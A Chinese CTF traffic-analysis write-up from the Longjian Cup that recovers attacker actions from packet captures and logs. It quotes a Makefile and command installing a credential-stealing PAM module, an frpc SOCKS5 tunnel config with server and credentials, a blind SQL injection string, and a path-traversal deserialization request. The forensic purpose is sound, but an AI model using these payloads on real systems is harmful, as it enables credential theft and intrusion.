从陇剑杯学习流量分析

  • Comments Off on 从陇剑杯学习流量分析
  • 44 views
  • A+
所属分类:CTF专场

JWT

使用wireshark打开附件,追踪HTTP流。

从陇剑杯学习流量分析

分析这个JWT字段,到jwt.io下面去解出来

从陇剑杯学习流量分析

追踪TCP流,到第10个TCP时,我们可以发现这里实现了命令执行,输出了当前服务器的权限。

从陇剑杯学习流量分析

获得命令执行接口后,上传了一个c文件到tmp目录下。

从陇剑杯学习流量分析

上传该c文件后,使用makefile操作将这个c文件编译成恶意的so文件。

CFLAGS += -Werror -Wall

looter.so: looter.c
gcc $(CFLAGS) -fPIC -shared -Xlinker -x -o [email protected] $< -lcurl
  • 1
  • 2
  • 3
  • 4

在第26个数据报中可以看到修改文件内容的命令

command=echo "auth optional looter.so">>/etc/pam.d/common-aut
  • 1

webshell

找到用于web应用登录的用户名和密码

从陇剑杯学习流量分析

查看cookie可以看到这是thinkphp的框架,这里也显示了这个web服务器的日志文件目录。

Cookie: PHPSESSID=c7rg88itbq4egddujcpt67mqh6; think_language=zh-CN; think_template=default
  • 1

从陇剑杯学习流量分析

由于是一句话木马获取webshell,所以权限是www-data

从陇剑杯学习流量分析

查看攻击者使用的代理工具

从陇剑杯学习流量分析

将上面的字符串L3Zhci93d3cvaHRtbC9mcnBj进行base64解码,得知代理工具为frpc

同时,将后面的十六进制数值进行解码,得到以下信息。

[common]
server_addr = 192.168.239.123
server_port = 7778
token=Xa3BJf2l5enmN6Z7A8mv

[test_sock5]
type = tcp
remote_port =8111
plugin = socks5
plugin_user = 0HDFt16cLQJ
plugin_passwd = JTN276Gp
use_encryption = true
use_compression = true
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13

sql注入

日志文件中使用了sql盲注进行数据的爆破

1 and if(substr(database(),1,1) = 'w',1,(select table_name from information_schema.tables))
  • 1

if函数,如果第一个表达式的值为真,那么返回第二个表达式的值。如果为假,那么返回第二个表达式的值。

同时,我们知道,sql盲注在获得第一个字符后,就会终止爆破,去查找第二个字符。

从陇剑杯学习流量分析

以此类推,可以获得这里的数据库名以及其他信息。

日志分析

源码泄露

从陇剑杯学习流量分析

反序列化

GET /?filename=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Ftmp%2Fsess_car&content=func%7CN%3Bfiles%7Ca%3A2%3A%7Bs%3A8%3A%22filename%22%3Bs%3A16%3A%22.%2Ffiles%2Ffilename%22%3Bs%3A20%3A%22call_user_func_array%22%3Bs%3A28%3A%22.%2Ffiles%2Fcall_user_func_array%22%3B%7Dpaths%7Ca%3A1%3A%7Bs%3A5%3A%22%2Fflag%22%3Bs%3A13%3A%22SplFileObject%22%3B%7D
ser_func_array%22%3B%7Dpaths%7Ca%3A1%3A%7Bs%3A5%3A%22%2Fflag%22%3Bs%3A13%3A%22SplFileObject%22%3B%7D
  • 1
  • 2

相关推荐: 2021陇剑杯网络安全大赛-webshell

题目描述: 单位网站被黑客挂马,请您从流量中分析出webshell,进行回答: 解题思路: 3.1黑客登录系统使用的密码是[email protected]#。 3.2黑客修改了一个日志文件,文件的绝对路径为_/var/www/html/data/Runtime/Log…